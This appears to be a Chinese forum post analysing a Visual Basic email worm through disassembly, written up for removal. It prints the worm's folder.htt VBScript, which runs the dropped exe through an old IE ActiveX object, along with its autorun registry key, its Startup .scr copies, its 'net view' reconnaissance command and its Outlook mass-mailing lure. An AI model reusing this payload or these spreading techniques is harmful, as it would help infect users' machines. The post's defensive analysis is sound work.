【内容】朋友系统第三次系统重做了。依然有毒。电脑没有连网,都不知道他做什么坏事染上的。找到了问题文件看了看。
PEID 查壳无壳。VB 写的。用VBEXPLORER 可以编译,那应该就是P-Code。据看雪书中记载,P-Code优点是使得程序不依赖于硬件或操作系统而成为可能。寝室几个人的从2000 到XP 都有这个毒。
0040153C |80264000 DD vc.00402680 ; UNICODE ".com"
00401540 |002D4000 DD vc.00402D00 ; UNICODE "fullpath"
00401544 |542C4000 DD vc.00402C54 ; UNICODE
"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Cabinet
State"
00401548 |00174000 DD vc.00401700
0040154C |842D4000 DD vc.00402D84 ; UNICODE
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetSt
ate"
00401550 |CC2E4000 DD vc.00402ECC ; UNICODE
"HideFileExt"
00401554 |2C2E4000 DD vc.00402E2C ; UNICODE
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
00401558 |E82E4000 DD vc.00402EE8 ; UNICODE "Hidden"
0040155C |FC2E4000 DD vc.00402EFC ; UNICODE
"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advance
d"
00401560 |6C264000 DD vc.0040266C ; UNICODE "TempCom"
00401564 |E4254000 DD vc.004025E4 ; UNICODE
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
00401568 |DC164000 DD vc.004016DC
0040156C |48294000 DD vc.00402948 ; UNICODE "Error"
00401570 |38324000 DD vc.00403238 ; UNICODE "\FONTS"
00401574 |90264000 DD vc.00402690 ; UNICODE "1.com"
程序写启动项HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
键值名为“TempCom”。,写系统目录(C:\WINNT\FONTS\),生成一个名称是四位随机名字.com 运行的程序。用时间来运行09:30:00 22:03:36等几个时间控制,到点执行指令。生成文件图标的文件的.exe运行程序,修改文件夹属性为隐藏和隐藏文件的后缀名.2000是默认隐藏文件,但是2003是显示文件名的。
**********Reference To->msvbvm60.rtcShell
|
:00409A27 0A4B000800 ImpAdCallFPR4 ;Call
ptr_004010FC; check stack 0008; Push EAX
:00409A2C 7410FE FStFPR8 ;Fstp#8
[LOCAL_01F0]
:00409A2F 356CFF FFree1Var ;Free
LOCAL_0094
:00409A32 001E LargeBos ;IDE beginning
of line with 1E byte codes
:00409A34 F502000000 LitI4 ;Push 00000002
:00409A39 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\command /c net view >D:\net.txt"
|
:00409A3C 3A4CFF6800 LitVarStr ;PushVarString
ptr_00402AFC
:00409A41 FB946CFF AddVar ;
**********Reference To->msvbvm60.rtcShell
\command /c net view >D:\net.txt net view 是查看内网共享文件想必是要内网传播。
:0040990B 1B3700 LitStr ;Push
ptr_0040274C
:0040990E FEC9 CDateStr ;vbaDateStr
:00409910 080800 FLdPr
;[SR]=[STACK_0008]
:00409913 924400 MemStFPR8 ;
:00409916 002F LargeBos ;IDE beginning
of line with 2F byte codes
:00409918 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\All Users\Start Menu\Programs\苧?\??.scr"
|
:0040991B 3A4CFF6300 LitVarStr ;PushVarString
ptr_004029D8
:00409920 FB946CFF AddVar ;
:00409924 FDFE28FE CStrVarVal ;
:00409928 045CFF FLdRfVar ;Push
LOCAL_00A4
**********Reference To->msvbvm60.rtcFileDateTime
|
:0040992B 0A39000800 ImpAdCallFPR4 ;Call
ptr_004010EA; check stack 0008; Push EAX
:00409930 045CFF FLdRfVar ;Push
LOCAL_00A4
:00409933 FC4F FnCDateVar ;vbaDateVar
:00409935 080800 FLdPr
;[SR]=[STACK_0008]
:00409938 924400 MemStFPR8 ;
:0040993B 2F28FE FFree1Str ;SysFreeString
[LOCAL_01D8]; [LOCAL_01D8]=0
:0040993E 3604006CFF5CFF FFreeVar ;Free 0004/2
variants
:00409945 000F LargeBos ;IDE beginning
of line with 0F byte codes
:00409947 080800 FLdPr
;[SR]=[STACK_0008]
:0040994A 8D4400 MemLdFPR8 ;
:0040994D 793A00 ImpAdLdFPR8 ;
:00409950 D2 LtR8 ;
:00409951 1C130D BranchF ;If Pop=0 then
ESI=00409977
:00409954 0023 LargeBos ;IDE beginning
of line with 23 byte codes
:00409956 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\All Users\Start Menu\Programs\??\??.scr"
|
:00409959 3A4CFF6300 LitVarStr ;PushVarString
ptr_004029D8
:0040995E FB946CFF AddVar ;
:00409962 FDFE28FE CStrVarVal ;
:00409966 080800 FLdPr
;[SR]=[STACK_0008]
:00409969 8A7000 MemLdStr ;Push DWORD
[[SR]+0070]
**********Reference To->msvbvm60.rtcFileCopy
|
:0040996C 0A3F000800 ImpAdCallFPR4 ;Call
ptr_004010F6; check stack 0008; Push EAX
:00409971 2F28FE FFree1Str ;SysFreeString
[LOCAL_01D8]; [LOCAL_01D8]=0
:00409974 356CFF FFree1Var ;Free
LOCAL_0094
:00409977 0002 LargeBos ;IDE beginning
of line with 02 byte codes
:00409979 000D LargeBos ;IDE beginning
of line with 0D byte codes
******Possible String Ref To->"00-1-01 22:03:36"
|
:0040997B 1B3700 LitStr ;Push
ptr_0040274C
:0040997E FEC9 CDateStr ;vbaDateStr
:00409980 080800 FLdPr
;[SR]=[STACK_0008]
:00409983 924400 MemStFPR8 ;
:00409986 001B LargeBos ;IDE beginning
of line with 1B byte codes
******Possible String Ref To->"C:\Documents and Settings\All Users\?縋蕇瞨祎\
硁?\苧?\??.scr"
|
:00409988 1B6400 LitStr ;Push
ptr_00402A30
:0040998B 046CFF FLdRfVar ;Push
LOCAL_0094
msvbvm60.rtcFileCopy 复制自身到多个目录下面。All Users的启动目录。命名为 启动.scr 屏保后缀
%WINDOWS%\All Users\Start Menu\Programs\启动\启动.scr (Win98系统)
C:\Documents and Settings\All Users\[开始]菜单\程序\启动\启动.scr(win2000和winxp系统)
A:\Explorer.EXE
A:\WINDOWS.EXE
004013FC /50334000 DD vc.00403350 ; UNICODE "folder.htt"
00401400 |58A04000 DD vc.0040A058
00401404 |8C274000 DD vc.0040278C ; UNICODE "getfile"
00401408 |9C274000 DD vc.0040279C ; UNICODE "Attributes"
0040140C |68334000 DD vc.00403368 ; UNICODE "Close"
00401410 |74334000 DD vc.00403374 ; UNICODE
"createtextfile"
00401414 |98334000 DD vc.00403398 ; UNICODE "<html>"
00401418 |28274000 DD vc.00402728 ; UNICODE "
"
0040141C |AC334000 DD vc.004033AC ; UNICODE "<head>"
00401420 |DC334000 DD vc.004033DC ; UNICODE "<meta
http-equiv=*content-type* content=*text/html; charset=UTF-8*>"
00401424 |68344000 DD vc.00403468 ; UNICODE "</head>"
00401428 |7C344000 DD vc.0040347C ; UNICODE "<body
style=*margin: 0* scroll=no>"
0040142C |C8344000 DD vc.004034C8 ; UNICODE "<object
id=FileList border=0 tabindex=1"
00401430 |1C354000 DD vc.0040351C ; UNICODE "classid =
*clsid:1820FED0-473E-11D0-A96C-00C04FD705A2*"
00401434 |90354000 DD vc.00403590 ; UNICODE
"style=*width: 100%; height: 100%* tabIndex=-1>"
00401438 |F4354000 DD vc.004035F4 ; UNICODE "</object>"
0040143C |0C364000 DD vc.0040360C ; UNICODE "</body>"
00401440 |20364000 DD vc.00403620 ; UNICODE "</html>"
00401444 |34364000 DD vc.00403634 ; UNICODE "<script
language=vbscript>"
00401448 |5C374000 DD vc.0040375C ; UNICODE
"document.write *<div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28;"
0040144C |00394000 DD vc.00403900 ; UNICODE "</script>"
00401450 |18394000 DD vc.00403918 ; UNICODE "On Error
Resume Next"
00401454 |70364000 DD vc.00403670 ; UNICODE "Dim path"
00401458 |88364000 DD vc.00403688 ; UNICODE "Path = **"
0040145C |A0364000 DD vc.004036A0 ; UNICODE "Path =
Left(document.location, Len(document.location) - 11)"
00401460 |1C374000 DD vc.0040371C ; UNICODE "Path =
Mid(Path, 9)+*/*"
00401464 |48394000 DD vc.00403948 ; UNICODE "Set
AppleObject = document.applets(*l*)"
00401468 |9C394000 DD vc.0040399C ; UNICODE
"AppleObject.setCLSID (*{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}*)"
0040146C |203A4000 DD vc.00403A20 ; UNICODE
"AppleObject.createInstance()"
00401470 |603A4000 DD vc.00403A60 ; UNICODE
"sd=*w*+*sshe*+*ll*"
00401474 |8C3A4000 DD vc.00403A8C ; UNICODE "Set sd =
AppleObject.GetObject()"
00401478 |D43A4000 DD vc.00403AD4 ; UNICODE "sd.run(Path
+ exename1)"
00401414 到 00401478 是folder.htt
的内容,查了F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 是利用一个很古老的IE 漏洞。在C.D.E.G 四个盘下写folder.htt .desktop.ini 和windows.exe 这个windows.exe被隐藏后缀明,又是文件夹图标,很极容易认为是文件夹而且运行。 当你访问C.D.E.G 这四个盘的根目录时候就运行病毒文件,也就是你系统重做后,访问其他的盘,病毒又把你刚做的C 盘感染。并且在所有的子目录下生成同名的文件,并且是隐藏属性加folder.htt的访问启动。
:00406E63 0A0E001000 ImpAdCallFPR4 ;Call
ptr_004016E8; check stack 0010; Push EAX
:00406E68 32060068FF64FFE0 FFreeStr ;Do
SysFreeString [arg_n]; [arg_n]=0 0006/2 times ~ arg
:00406E71 36040054FF34FF FFreeVar ;Free 0004/2
variants
:00406E78 F401 LitI2_Byte ;Push 01
:00406E7A 0476FF FLdRfVar ;Push
LOCAL_008A
:00406E7D 6B74FF FLdI2 ;Push WORD
[LOCAL_008C]
:00406E80 FE63DCFE2402 ForI2 ;
:00406E86 2844FF0000 LitVarI2 ;PushVarInteger
0000
:00406E8B 25 PopAdLdVar ;
:00406E8C 0870FF FLdPr
;[SR]=[LOCAL_0090]
:00406E8F FE9A54FF0F000100 LateMemCallLdVar ;
:00406E97 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406E9A FE4E SetVarVarFunc ;
:00406E9C 0476FF FLdRfVar ;Push
LOCAL_008A
:00406E9F FD930240 CDargRef ;
:00406EA3 0404FF FLdRfVar ;Push
LOCAL_00FC
:00406EA6 FF4254FF0B000100 VarLateMemCallLdVar ;
:00406EAE 04BCFE FLdRfVar ;Push
LOCAL_0144
:00406EB1 FE4E SetVarVarFunc ;
******Possible String Ref To->"Mywoman@163.com"
|
:00406EB3 3A44FF1000 LitVarStr ;PushVarString
ptr_004030F8
:00406EB8 25 PopAdLdVar ;
:00406EB9 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EBC FF431100 VarLateMemSt ;
:00406EC0 04BCFE FLdRfVar ;Push
LOCAL_0144
:00406EC3 FF4154FF1200 VarLateMemLdVar ;
:00406EC9 25 PopAdLdVar ;
:00406ECA 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406ECD FF431300 VarLateMemSt ;
:00406ED1 3554FF FFree1Var ;Free
LOCAL_00AC
******Possible String Ref To->"??
??"
|
:00406ED4 3A44FF1400 LitVarStr ;PushVarString
ptr_00403140
:00406ED9 25 PopAdLdVar ;
:00406EDA 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EDD FF431500 VarLateMemSt ;
******Possible String Ref To->"?????
???礑??荈????:)"
|
:00406EE1 3A44FF1600 LitVarStr ;PushVarString
ptr_00402D20
:00406EE6 25 PopAdLdVar ;
:00406EE7 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EEA FF431700 VarLateMemSt ;
:00406EEE 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EF1 FF4154FF1800 VarLateMemLdVar ;
:00406EF7 04ACFE FLdRfVar ;Push
LOCAL_0154
:00406EFA FE4E SetVarVarFunc ;
:00406EFC 051900 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\??.exe"
|
:00406EFF 3A44FF1A00 LitVarStr ;PushVarString
ptr_00402958
:00406F04 FB9454FF AddVar ;
:00406F08 25 PopAdLdVar ;
:00406F09 04ACFE FLdRfVar ;Push
LOCAL_0154
:00406F0C FD9F LdPrVar ;
:00406F0E FE981B000100 LateMemCall ;
:00406F14 3554FF FFree1Var ;Free
LOCAL_00AC
:00406F17 6344FF LitVar_TRUE ;
:00406F1A 25 PopAdLdVar ;
:00406F1B 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406F1E FF431C00 VarLateMemSt ;
:00406F22 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406F25 FF4154FF1300 VarLateMemLdVar
总结:典型一个邮件病毒程序写启动项HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
键值名为“TempCom”。,写系统的字体路径(C:\WINNT\FONTS\),生成一个名称是四位随机名字.com 运行的程序。用时间来运行09:30:00 22:03:36等几个时间控制,到点执行指令。生成文件图标的文件的.exe运行程序,修改文件夹属性为隐藏和隐藏文件的后缀名.2000是默认隐藏文件,但是2003是显示文件名的。
\command /c net view >D:\net.txt net view 是查看内网共享文件想必是要内网传播。
msvbvm60.rtcFileCopy 复制自身到多个目录下面。All Users的启动目录。命名为 启动.scr 屏保后缀
%WINDOWS%\All Users\Start Menu\Programs\启动\启动.scr (Win98系统)
C:\Documents and Settings\All Users\[开始]菜单\程序\启动\启动.scr (win2000.2003和winxp系统)
A:\Explorer.EXE A:\WINDOWS.EXE
在C.D.E.G 四个盘下写folder.htt启动 .desktop.ini 和windows.exe 这个windows.exe被隐藏后缀明,又是文件夹图标,很极容易认为是文件夹而运行。
当你访问C.D.E.G 这四个盘的根目录时候就运行病毒文件,也就是你系统重做后,访问其他的盘,病毒又把你刚做的C 盘感染。并且在所有的子目录下生成同名的文件,并且是隐藏属性加folder.htt的访问启动。
程序会利用本机的 Outlook 进行网络传播。
邮件
form:Mywoman@163.com //应该是病毒的作者吧.
to:你outlook的好友
标题: 美女
内容:这是一个关于美女的故事,请看附件吧
生成一个:美女.exe 的附件
分析了他的运行原理,手工删吧。根据病毒的运行时间搜索那段时间所有的改动文件,程序程序还会毒中含毒.释放一个Win32.Parite.A 版的病毒,感染本机器所有的可执行文件,郁闷,好多游戏都坏了。还好有in32.Parite.A 的专杀工具,安全模式杀了我2个小时.
您当前的位置:
《Windows木马清道夫》是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品,是全新一代的木马克星!《Windows木马清道夫》可自动查杀数十万种木马,拥有海量木马病毒库,配合手动分析可近100%对未知木马进行查杀!它不仅可以查木马,还可以分析出后门程序,黑客程序等等。它专业的分析功能,完美的升级功能,使您不再惧怕木马,让您远离木马的困扰
卡巴斯基单机版(Kaspersky Anti-Virus Personal)是俄罗斯著名数据安全厂商Kaspersky Labs专为我国个人用户度身定制的反病毒产品。这款产品功能包括:病毒扫描、驻留后台的病毒防护程序、脚本病毒拦截器以及邮件检测程序,时刻监控一切病毒可能入侵的途径。产品采用第二代启发式代码分析技术、iChecker实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术